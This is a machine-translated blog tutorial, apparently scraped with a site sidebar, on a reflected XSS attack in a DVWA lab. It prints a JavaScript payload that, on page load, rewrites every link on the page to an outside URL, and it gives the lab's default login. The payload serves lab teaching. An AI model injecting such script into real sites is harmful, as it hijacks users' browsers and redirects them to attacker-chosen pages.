当前位置:网站首页>XX attack - reflective XSS attack hijacking user browser
XX attack - reflective XSS attack hijacking user browser
2022-07-01 08:08:00 【Cwillchris】
Let's build a reflective XSS The attack jumps to the vulnerable page . In fact, it can also be in DVWA Attack directly in , But we constructed a relatively complex environment for demonstration purposes .
<script>
window.onload = function() {
var link=document.getElementsByTagName("a");
for(j = 0; j < link.length; j++) {
link[j].href="http://www.baidu.com";}
}
</script>
JavaScript The code analysis window.onload When the web page is loaded , perform function Anonymous functions
The functionality :document.getElementsByTagName Gets all of the a label , Store in link Array , Use for The cycle will link Replace all elements in the array with malicious URLs .
open chrome browser , We're in reflex XSS Test the effect
Sign in http://192.168.98.66/DVWA-master/login.php user name : admin password :password , Change it to low Level
边栏推荐
- sqlalchemy创建MySQL_Table
- 2022.6.30 省赛+蓝桥国赛记录
- On June 30, 2022, the record of provincial competition + national competition of Bluebridge
- Erreur de hauteur du clavier souple
- 力扣每日一题-第32天-1822.数组元素积的符号
- web254
- [force deduction 10 days SQL introduction] Day10 control flow
- Sorting out tcp/udp communication problems
- Why are some Wills made by husband and wife invalid
- Chinese font Gan: zi2zi
猜你喜欢
![[untitled]](/img/c2/63286ba00321c9cdef43ff40635a67.png)
![[question brushing] character statistics [0]](/img/cc/f5aaecd920c502180303d92447e54f.png)
随机推荐
Airsim雷达相机融合生成彩色点云
Lm08 mesh series mesh inversion (fine)
LM08丨网格系列之网格反转(精)
Php laraver Wechat payment
Soft keyboard height error
[untitled]
Introduction to kubernetes resource objects and common commands (II)
slice扩容机制分析
The difference between interceptors and filters
[MySQL learning notes27] stored procedure
sqlalchemy创建MySQL_Table
[dynamic planning] p1020 missile interception (variant of the longest increasing subsequence)
Programmer's regimen
How to prevent the other party from saying that he has no money after winning the lawsuit?
Gui Gui programming (XV) - use scale to control font size changes
Transaction method call @transactional
[staff] key number (key number identification position | key number marking list | a major key identification principle | F, C, G position marking ascending | F major key identification principle | B
postgresql源码学习(26)—— Windows vscode远程调试Linux上的postgresql
PWN attack and defense world int_ overflow
golang中的正则表达式使用注意事项与技巧